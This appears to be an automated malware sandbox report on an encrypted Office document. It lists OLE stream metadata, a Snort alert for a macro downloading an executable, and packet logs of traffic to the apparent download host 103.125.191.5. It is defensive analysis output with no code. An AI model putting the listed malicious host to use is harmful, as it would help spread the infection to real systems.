                                                                                                                                                Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:112
                                                                                                                                                Entropy:2.7597816111
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:200
                                                                                                                                                Entropy:3.13335930328
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/Version
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:76
                                                                                                                                                Entropy:2.79079600998
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                Stream Path: EncryptedPackage, File Type: PGP symmetric key encrypted data - Plaintext or unencrypted data, Stream Size: 2458264
                                                                                                                                                General
                                                                                                                                                Stream Path:EncryptedPackage
                                                                                                                                                File Type:PGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                                                                                                Stream Size:2458264
                                                                                                                                                Entropy:7.99990874269
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                General
                                                                                                                                                Stream Path:EncryptionInfo
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:224
                                                                                                                                                Entropy:4.56052515619
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . f . ] . . . D . 7 . / & . X . l . . . E I ~ b . . . ! X . A . . . . t < . . . . . . x . . . A . l . . \\ . . @ . . . . . . . . x 6 .
                                                                                                                                                Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/20/20-11:23:46.787297 | TCP | 2022550 | ET TROJAN Possible Malicious Macro DL EXE Feb 2016 | 49165 | 80 | 192.168.2.22 | 103.125.191.5

                                                                                                                                                TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                Nov 20, 2020 11:23:47.666487932 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666501045 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666522026 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666527033 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666555882 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666568995 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666590929 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666610956 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666625023 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666636944 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666665077 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.669146061 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.670757055 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670782089 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670799971 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670815945 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670835018 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670851946 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670912981 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.670955896 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.677650928 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885488033 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885545969 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885585070 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885624886 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885657072 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885664940 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885693073 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885699034 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885713100 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885756969 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885795116 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885807991 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885828018 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885834932 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885850906 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885875940 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885915995 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885951996 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885952950 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885963917 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885971069 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885993004 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886001110 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886040926 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886056900 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886084080 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886109114 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886122942 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886157990 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886166096 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886205912 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886234045 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886245966 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886251926 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886301041 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886307001 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886312008 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886369944 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886435032 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886446953 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886487961 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886495113 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886528969 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886533976 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886579037 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886600018 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.887670994 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.887762070 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.887806892 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.887851000 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.887878895 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.887924910 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.887943983 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.887964010 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.887995958 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888015985 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888019085 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888072014 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888078928 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888140917 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888147116 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888206005 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888210058 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888252020 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888267040 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888292074 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888330936 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888339043 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888370037 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888384104 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888401985 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888408899 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888431072 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888477087 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888482094 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888520002 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888573885 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888596058 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888613939 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888632059 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888649940 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888698101 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.889251947 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.895968914 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896008968 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896044970 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.896080971 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.896224022 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896255016 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896279097 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.896282911 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896300077 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.896313906 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896339893 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.896365881 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.900839090 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.901973009 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.105305910 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105372906 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105452061 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105492115 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105528116 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105566978 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105587006 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.105603933 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105623960 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.105629921 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.105634928 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.105662107 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106247902 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327481985 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327495098 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.327518940 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327570915 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.327590942 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327593088 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.327645063 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.327655077 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327693939 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327725887 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.327730894 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327763081 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.327799082 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327802896 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.327838898 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327876091 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327877045 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.327939034 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.327961922 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.327976942 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328042030 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328046083 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328049898 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328078985 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328080893 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328118086 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328130960 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328155041 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328176975 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328195095 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328218937 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328232050 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328290939 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328322887 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328330040 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328387022 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328397989 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328438044 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328452110 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328502893 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328516960 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328553915 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328569889 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328591108 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328607082 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328628063 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328648090 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328672886 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328692913 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328715086 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328737020 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328752041 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328773975 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328789949 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328810930 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328826904 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328855038 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328864098 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328896999 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328902006 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328939915 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.328941107 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328979969 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.328984976 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.329025984 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.329041958 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.329061985 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.329082966 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.329098940 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.329123974 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.329135895 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.329180956 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.329186916 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.329216957 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.329246998 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.329278946 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.329310894 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.340476990 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.340549946 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.340552092 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.340601921 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.340620041 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.340667963 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.340678930 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.340719938 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.340720892 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.340764046 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.340778112 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.340817928 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.340826035 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.340876102 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.340883017 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.340914965 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.340930939 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.340969086 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.340974092 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341013908 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341028929 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341065884 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341068029 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341104984 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341111898 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341149092 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341154099 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341202021 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341253042 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341295004 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341335058 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341379881 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341463089 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341506958 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341523886 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341559887 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341571093 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341614962 CET4916580192.168.2.22103.125.191.5
